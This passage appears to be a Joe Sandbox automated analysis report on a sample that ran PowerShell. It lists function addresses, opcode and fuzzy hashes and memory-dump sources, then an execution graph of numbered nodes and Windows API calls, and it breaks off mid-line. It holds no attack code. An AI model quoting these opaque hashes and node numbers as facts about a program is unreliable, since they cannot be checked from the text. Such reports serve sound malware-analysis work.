                                                                                                                                                                      • Opcode ID: 8f6da8ea310a472e6f4db7dee09ab3bc97a0f2d24c2ad39d2699cb80b864f822
                                                                                                                                                                      • Instruction ID: 61f394e6121f8525584eb1bc629bc6c96f4688f1b75c4343152d16865e80bb5e
                                                                                                                                                                      • Opcode Fuzzy Hash: 8f6da8ea310a472e6f4db7dee09ab3bc97a0f2d24c2ad39d2699cb80b864f822
                                                                                                                                                                      • Instruction Fuzzy Hash: CCC18031A08A5E9FDF98DF5CD455AAD77E1FF68300F24416AD419D7286CB34E882CB90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFCDFCB452C Relevance: .2, Instructions: 196COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.205715498.00007FFCDFCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFCB0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffcdfcb0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff27d33c100def991a2202ae8ee56e0af2f1777890732a1b5ef20cbd2a1f1c6
                                                                                                                                                                      • Instruction ID: 0e40aec4e6baaf9f951ab48884870b3d878ca9094434815c0376173131f65f8b
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff27d33c100def991a2202ae8ee56e0af2f1777890732a1b5ef20cbd2a1f1c6
                                                                                                                                                                      • Instruction Fuzzy Hash: 3251D036E0CA6D4FEBA8DA1CA8156BD37D1FF952A0F0801BBD05DC3192DA15AD15C391
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFCDFCB4253 Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.205715498.00007FFCDFCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFCB0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffcdfcb0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: cd7f129083123670759695ce236956dbb17996f95b524389f25fd352a8ffaa47
                                                                                                                                                                      • Instruction ID: a7e01d42c979a62e52f3b4b2501cebb47a22af0f387d07825641e2c9bff3abff
                                                                                                                                                                      • Opcode Fuzzy Hash: cd7f129083123670759695ce236956dbb17996f95b524389f25fd352a8ffaa47
                                                                                                                                                                      • Instruction Fuzzy Hash: B4510126B0DA6E0FEBA9DA1C645127C37D2FFC52A0F4901BBC06EC7192CE25E815C352
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFCDFBEA9A8 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.205424181.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffcdfbe0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3e9a81214c54cbc1243883b40537f5d77d4afd61816875674338b4fd253ef167
                                                                                                                                                                      • Instruction ID: 3c023ff3352597cb924d751ef156a1e3bd1df0b40152b0df0c58d06d5b221d3d
                                                                                                                                                                      • Opcode Fuzzy Hash: 3e9a81214c54cbc1243883b40537f5d77d4afd61816875674338b4fd253ef167
                                                                                                                                                                      • Instruction Fuzzy Hash: E931903191CB4C9FDB189B4C984A6AD7BE0FBA8321F00422FE459D3252DB70A8558BC2
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFCDFCB429F Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.205715498.00007FFCDFCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFCB0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffcdfcb0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 78545f2b996e834b4d83696c44e191dc6d8461292cacf1d7dfec5756a8290889
                                                                                                                                                                      • Instruction ID: 0ba927594bba8f3023ba5354abc4a9f2420617da6222b031f8c7002502e37dbb
                                                                                                                                                                      • Opcode Fuzzy Hash: 78545f2b996e834b4d83696c44e191dc6d8461292cacf1d7dfec5756a8290889
                                                                                                                                                                      • Instruction Fuzzy Hash: 5731BF2AB0DA6B4FEBB9DA18645113C26D1FFC5290F9D01BBC06DC7192CE28E910C352
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFCDFCB459C Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.205715498.00007FFCDFCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFCB0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffcdfcb0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f9cacb73bab619b6449c8b850f09e44cc9c4f9a94daf3b3960dd9ee138001bdd
                                                                                                                                                                      • Instruction ID: 4d575bd8b9897f57fae7f04d2b0d81e1b06d2a08007771cd5527862b7e8917c9
                                                                                                                                                                      • Opcode Fuzzy Hash: f9cacb73bab619b6449c8b850f09e44cc9c4f9a94daf3b3960dd9ee138001bdd
                                                                                                                                                                      • Instruction Fuzzy Hash: FF11BC36E0D9AA4FE6B5DA18A4609BC66D0FF852A0F4901BBD06DC7092D919AD24C361
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFCDFBE37D5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.205424181.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffcdfbe0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: dcc33d4d49d4dfc0f78d8b6d200cd766edcce86ce717b4eb2af09faad1a86dfd
                                                                                                                                                                      • Instruction ID: 3374eb148f6c064954ed6c353bab9667d28b59ea4ce6d28c2a4843fe25b51521
                                                                                                                                                                      • Opcode Fuzzy Hash: dcc33d4d49d4dfc0f78d8b6d200cd766edcce86ce717b4eb2af09faad1a86dfd
                                                                                                                                                                      • Instruction Fuzzy Hash: 4701677111CB0C4FD748EF0CE451AAAB7E0FB95324F10056EE59AC3651D736E891CB46
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFCDFBEAF06 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.205424181.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffcdfbe0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 21a2b0703ab161f9051fe8a518d58348354e5bf80986fdfded781d40d32767a4
                                                                                                                                                                      • Instruction ID: ce3d89cfab0b2545b1f631d821e1a952345affaee07f3e951fb16c33c53879bf
                                                                                                                                                                      • Opcode Fuzzy Hash: 21a2b0703ab161f9051fe8a518d58348354e5bf80986fdfded781d40d32767a4
                                                                                                                                                                      • Instruction Fuzzy Hash: 04F0307180868D8FDB45DF2888194E9BFF0FF65210B0542DBE84DCB562D765D958CBC2
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFCDFBE7568 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.205424181.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffcdfbe0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e570f86c5d9e595fdc38bd90e3f15f5a93badf67da54eafacdf75b6911775021
                                                                                                                                                                      • Instruction ID: 2f7cca29ed90ac11b55b560b4b6eae714563e2cf9acf6583b7aae5d03727539f
                                                                                                                                                                      • Opcode Fuzzy Hash: e570f86c5d9e595fdc38bd90e3f15f5a93badf67da54eafacdf75b6911775021
                                                                                                                                                                      • Instruction Fuzzy Hash: 14E0EC75814A4C9F8B44EF18D8199EE77E4FB68305B01425BF81ED7160DB31EA58CBC2
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 00007FFCDFBE7143 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.205424181.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffcdfbe0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 803d86577e41ee5d4296fae9a4692b35ca4f13f27dacb7828353dd23452afaf8
                                                                                                                                                                      • Instruction ID: 8c25434c40b5564de15b72d0e4a74aef68ec6c35fc5b9c0d7752c4f4cfcce0e4
                                                                                                                                                                      • Opcode Fuzzy Hash: 803d86577e41ee5d4296fae9a4692b35ca4f13f27dacb7828353dd23452afaf8
                                                                                                                                                                      • Instruction Fuzzy Hash: ADD0238770F3A6DDE2015208FCA00DD5B28FC911713250177D0984905269044807C175
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FFCDFCB183C Relevance: 2.8, Strings: 2, Instructions: 323COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000025.00000002.224616786.00007FFCDFCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFCB0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_37_2_7ffcdfcb0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: @X;$@nw7
                                                                                                                                                                      • API String ID: 0-3885318253
                                                                                                                                                                      • Opcode ID: 3a97381eebcb60c4fd402510285c79f098d07e7736fd81fee2e2b85f5325be10
                                                                                                                                                                      • Instruction ID: 04077bbcda3f7739385364e319cfdb5d1db6c0b73e9266111ca3c3556efc65d9
                                                                                                                                                                      • Opcode Fuzzy Hash: 3a97381eebcb60c4fd402510285c79f098d07e7736fd81fee2e2b85f5325be10
                                                                                                                                                                      • Instruction Fuzzy Hash: 94910726B0DB9A5FE76A8A2868551BD3BE1FF86264F0801FFD05DC7093DD18AC16C351
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFCDFCB1AEE Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000025.00000002.224616786.00007FFCDFCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFCB0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_37_2_7ffcdfcb0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f55fe35eca88c73f429fb024a11134d1e8efb1a52d80ccea8eb1e871258a260a
                                                                                                                                                                      • Instruction ID: 4463e468e092787f408bf3dc26b21c06b04719a9b5eabaf3d597c30e2f51f818
                                                                                                                                                                      • Opcode Fuzzy Hash: f55fe35eca88c73f429fb024a11134d1e8efb1a52d80ccea8eb1e871258a260a
                                                                                                                                                                      • Instruction Fuzzy Hash: 4C412362F1CA2D1FEBB89A2864515BC73C2FF842A0F5811BBC42EC3086ED18AC11C391
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFCDFBE6911 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000025.00000002.224473203.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_37_2_7ffcdfbe0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 11c14a99e7488397c61044af53ec03b92204a4ce632ff262176def7f4d8fda6b
                                                                                                                                                                      • Instruction ID: e0776d4361da33e682cbe00f236cd9b6041d20cba2a25b7e9ef9dc161cf51bcd
                                                                                                                                                                      • Opcode Fuzzy Hash: 11c14a99e7488397c61044af53ec03b92204a4ce632ff262176def7f4d8fda6b
                                                                                                                                                                      • Instruction Fuzzy Hash: EA212A31A1891D8FDF88EB58D455EED77A2FF68744F140166E409D7286CB24E882CBC1
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFCDFBE6212 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000025.00000002.224473203.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_37_2_7ffcdfbe0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f40ed1f7b0219315804b20afbeb60a71e74cb6dae4d0829754d8dedd3da0e3a0
                                                                                                                                                                      • Instruction ID: 15533be65ed43c7a46aabc7ecc8ad8e0864027effe4e133012720a8978ceb578
                                                                                                                                                                      • Opcode Fuzzy Hash: f40ed1f7b0219315804b20afbeb60a71e74cb6dae4d0829754d8dedd3da0e3a0
                                                                                                                                                                      • Instruction Fuzzy Hash: 3001C43171D90D4FEB4CAA1CE8625B873D1EB95360B1001AED84AC7293DD22F8438786
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFCDFBE4635 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000025.00000002.224473203.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_37_2_7ffcdfbe0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1c4602cee4c84f07abe60de7fd657edbd04cf2a8b88b27596276fded982b80f2
                                                                                                                                                                      • Instruction ID: f6858ce3d20c7d57526acc42eb1eeb2927518baa0a8f53c48706ea5b70729408
                                                                                                                                                                      • Opcode Fuzzy Hash: 1c4602cee4c84f07abe60de7fd657edbd04cf2a8b88b27596276fded982b80f2
                                                                                                                                                                      • Instruction Fuzzy Hash: DA01677111CB0C8FDB48EF4CE451AA9B7E0FB95324F10056EE58AC3651DB36E881CB45
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFCDFCB0ABD Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000025.00000002.224616786.00007FFCDFCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFCB0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_37_2_7ffcdfcb0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8b95e634e27e409663f8123737ec678b1a619ad6fed09dd25f4d9670803908c3
                                                                                                                                                                      • Instruction ID: 0fcf2bb3353a09bf58db7e6b51d9d501d9571ef56d2fe9a71cad06d0ab6c46cc
                                                                                                                                                                      • Opcode Fuzzy Hash: 8b95e634e27e409663f8123737ec678b1a619ad6fed09dd25f4d9670803908c3
                                                                                                                                                                      • Instruction Fuzzy Hash: 36F0C213E4D9AE0EF6B2A25828160BC66C0FF80690F4C00B7D02CC6083EC089C14C355
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFCDFBE7183 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000025.00000002.224473203.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_37_2_7ffcdfbe0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 45779c0a0c5b7c17016d1882502e76f34f42524ce55d9b976144c088fdb12a28
                                                                                                                                                                      • Instruction ID: b755216a790b9c1ca4111fffb7479087d5fab0be6c27082ea91b7dcc864ad38e
                                                                                                                                                                      • Opcode Fuzzy Hash: 45779c0a0c5b7c17016d1882502e76f34f42524ce55d9b976144c088fdb12a28
                                                                                                                                                                      • Instruction Fuzzy Hash: 14F0303275C6084FDB4CEA1CF8529B5B3D1E799334B00016FE48BC2657D927E8438A85
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFCDFBE71C8 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000025.00000002.224473203.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_37_2_7ffcdfbe0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2c49af5e8f1d357aa9f76c936d21e476c959a68a1fd6be7c1d73dd96044f49b5
                                                                                                                                                                      • Instruction ID: 39bea8ac3b74f4e0806b568883a3e7c8520b4b35c3f15abcc2487c8616c3d6c4
                                                                                                                                                                      • Opcode Fuzzy Hash: 2c49af5e8f1d357aa9f76c936d21e476c959a68a1fd6be7c1d73dd96044f49b5
                                                                                                                                                                      • Instruction Fuzzy Hash: 28F0373275C6084FDB4CEA1CF4529B973D1E795320B10016EE48BC2697D927F842CA85
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:8.1%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:0.5%
                                                                                                                                                                      Total number of Nodes:1170
                                                                                                                                                                      Total number of Limit Nodes:32
                                                                                                                                                                      execution_graph 38275 7ff6ee737a5b 38276 7ff6ee737a60 38275->38276 38279 7ff6ee737af7 38276->38279 38308 7ff6ee749be0 38276->38308 38278 7ff6ee737bda 38319 7ff6ee73b540 38278->38319 38279->38278 38411 7ff6ee751e1c GetFileTime 38279->38411 38284 7ff6ee73b540 147 API calls 38286 7ff6ee737c9c 38284->38286 38285 7ff6ee737c3e 38285->38284 38307 7ff6ee737f89 38286->38307 38413 7ff6ee756378 38286->38413 38288 7ff6ee737cd7 38289 7ff6ee756378 4 API calls 38288->38289 38290 7ff6ee737cf3 38289->38290 38291 7ff6ee737d38 38290->38291 38292 7ff6ee737d59 38290->38292 38305 7ff6ee737de1 38290->38305 38417 7ff6ee78a444 38291->38417 38295 7ff6ee78a444 new 4 API calls 38292->38295 38302 7ff6ee737d42 std::bad_alloc::bad_alloc 38295->38302 38296 7ff6ee737e4e 38430 7ff6ee731204 48 API calls 38296->38430 38298 7ff6ee737eb3 38300 7ff6ee737edb 38298->38300 38431 7ff6ee769680 38298->38431 38437 7ff6ee756424 8 API calls _UnwindNestedFrames 38300->38437 38302->38305 38423 7ff6ee78ba34 RtlPcToFileHeader RaiseException 38302->38423 38303 7ff6ee737f56 38306 7ff6ee73b540 147 API calls 38303->38306 38305->38296 38424 7ff6ee7698dc 38305->38424 38306->38307 38438 7ff6ee74901c CryptAcquireContextW 38308->38438 38312 7ff6ee749c2a 38448 7ff6ee779ce4 38312->38448 38316 7ff6ee749c5b memcpy_s 38458 7ff6ee78a610 38316->38458 38323 7ff6ee73b55f setbuf 38319->38323 38320 7ff6ee73b5a1 38321 7ff6ee73b5d8 38320->38321 38322 7ff6ee73b5b8 38320->38322 38597 7ff6ee768c1c 38321->38597 38483 7ff6ee73aba0 38322->38483 38323->38320 38479 7ff6ee73a4d0 38323->38479 38326 7ff6ee78a610 _UnwindNestedFrames 8 API calls 38328 7ff6ee737bf8 38326->38328 38327 7ff6ee73b67f 38329 7ff6ee73bc91 38327->38329 38331 7ff6ee73bbae 38327->38331 38332 7ff6ee73b6a5 38327->38332 38328->38285 38412 7ff6ee789b98 216 API calls 3 library calls 38328->38412 38330 7ff6ee73b5d3 38329->38330 38335 7ff6ee752574 126 API calls 38329->38335 38330->38326 38333 7ff6ee768d00 48 API calls 38331->38333 38332->38330 38345 7ff6ee73b6b5 38332->38345 38361 7ff6ee73b79f 38332->38361 38336 7ff6ee73bc5c 38333->38336 38335->38330 38666 7ff6ee768d38 48 API calls 38336->38666 38340 7ff6ee73bc69 38667 7ff6ee768d38 48 API calls 38340->38667 38343 7ff6ee73bc76 38668 7ff6ee768d38 48 API calls 38343->38668 38345->38330 38631 7ff6ee768d00 38345->38631 38346 7ff6ee73bc84 38669 7ff6ee768d88 48 API calls 38346->38669 38351 7ff6ee73b726 38635 7ff6ee768d38 48 API calls 38351->38635 38353 7ff6ee73b733 38354 7ff6ee73b749 38353->38354 38636 7ff6ee768d88 48 API calls 38353->38636 38356 7ff6ee73b75c 38354->38356 38637 7ff6ee768d38 48 API calls 38354->38637 38358 7ff6ee73b779 38356->38358 38360 7ff6ee768d00 48 API calls 38356->38360 38638 7ff6ee768f94 38358->38638 38360->38356 38362 7ff6ee73b8e5 38361->38362 38648 7ff6ee73c3c8 CharLowerW CharUpperW 38361->38648 38649 7ff6ee77d840 WideCharToMultiByte 38362->38649 38366 7ff6ee73b9a1 38368 7ff6ee768d00 48 API calls 38366->38368 38369 7ff6ee73b9c4 38368->38369 38652 7ff6ee768d38 48 API calls 38369->38652 38371 7ff6ee73b910 38371->38366 38651 7ff6ee73945c 55 API calls _UnwindNestedFrames 38371->38651 38372 7ff6ee73b9d1 38653 7ff6ee768d38 48 API calls 38372->38653 38374 7ff6ee73b9de 38654 7ff6ee768d88 48 API calls 38374->38654 38376 7ff6ee73b9eb 38655 7ff6ee768d88 48 API calls 38376->38655 38378 7ff6ee73ba0b 38379 7ff6ee768d00 48 API calls 38378->38379 38380 7ff6ee73ba27 38379->38380 38656 7ff6ee768d88 48 API calls 38380->38656 38382 7ff6ee73ba37 38383 7ff6ee73ba49 38382->38383 38657 7ff6ee77bc48 15 API calls 38382->38657 38658 7ff6ee768d88 48 API calls 38383->38658 38386 7ff6ee73ba59 38387 7ff6ee768d00 48 API calls 38386->38387 38388 7ff6ee73ba66 38387->38388 38389 7ff6ee768d00 48 API calls 38388->38389 38390 7ff6ee73ba78 38389->38390 38659 7ff6ee768d38 48 API calls 38390->38659 38392 7ff6ee73ba85 38660 7ff6ee768d88 48 API calls 38392->38660 38394 7ff6ee73ba92 38395 7ff6ee73bacd 38394->38395 38661 7ff6ee768d88 48 API calls 38394->38661 38663 7ff6ee768e3c 38395->38663 38397 7ff6ee73bab2 38662 7ff6ee768d88 48 API calls 38397->38662 38401 7ff6ee73bb33 38402 7ff6ee73bb53 38401->38402 38405 7ff6ee768e3c 48 API calls 38401->38405 38406 7ff6ee73bb6e 38402->38406 38408 7ff6ee768e3c 48 API calls 38402->38408 38403 7ff6ee768d00 48 API calls 38407 7ff6ee73bb09 38403->38407 38404 7ff6ee768e3c 48 API calls 38404->38401 38405->38402 38409 7ff6ee768f94 126 API calls 38406->38409 38407->38401 38407->38404 38408->38406 38409->38330 38411->38278 38412->38285 38414 7ff6ee756396 38413->38414 38416 7ff6ee7563a0 38413->38416 38415 7ff6ee78a444 new 4 API calls 38414->38415 38415->38416 38416->38288 38418 7ff6ee78a44f 38417->38418 38419 7ff6ee78a47a 38418->38419 38420 7ff6ee7936c0 new 2 API calls 38418->38420 38860 7ff6ee78b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38418->38860 38861 7ff6ee78b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38418->38861 38419->38302 38420->38418 38423->38305 38425 7ff6ee76993c 38424->38425 38426 7ff6ee769926 38424->38426 38428 7ff6ee7490b8 75 API calls 38425->38428 38427 7ff6ee7490b8 75 API calls 38426->38427 38429 7ff6ee769934 38427->38429 38428->38429 38429->38296 38430->38298 38436 7ff6ee7696a4 38431->38436 38432 7ff6ee7697d7 38433 7ff6ee752574 126 API calls 38433->38436 38435 7ff6ee789b98 216 API calls 38435->38436 38436->38432 38436->38433 38436->38435 38862 7ff6ee756498 72 API calls new 38436->38862 38437->38303 38439 7ff6ee749057 CryptGenRandom CryptReleaseContext 38438->38439 38440 7ff6ee74907e 38438->38440 38439->38440 38441 7ff6ee749089 38439->38441 38442 7ff6ee749c9c 11 API calls 38440->38442 38443 7ff6ee749c9c 38441->38443 38442->38441 38467 7ff6ee77c0a8 GetSystemTime SystemTimeToFileTime 38443->38467 38445 7ff6ee749cc5 38470 7ff6ee792d74 38445->38470 38449 7ff6ee749c49 38448->38449 38450 7ff6ee779d15 memcpy_s 38448->38450 38452 7ff6ee779b70 38449->38452 38450->38449 38473 7ff6ee779d74 38450->38473 38455 7ff6ee779bad memcpy_s 38452->38455 38456 7ff6ee779bd9 memcpy_s 38452->38456 38453 7ff6ee779d74 8 API calls 38454 7ff6ee779c07 38453->38454 38454->38316 38455->38456 38457 7ff6ee779d74 8 API calls 38455->38457 38456->38453 38457->38456 38459 7ff6ee78a61a 38458->38459 38460 7ff6ee749c86 38459->38460 38461 7ff6ee78a6a0 IsProcessorFeaturePresent 38459->38461 38460->38279 38462 7ff6ee78a6b7 38461->38462 38477 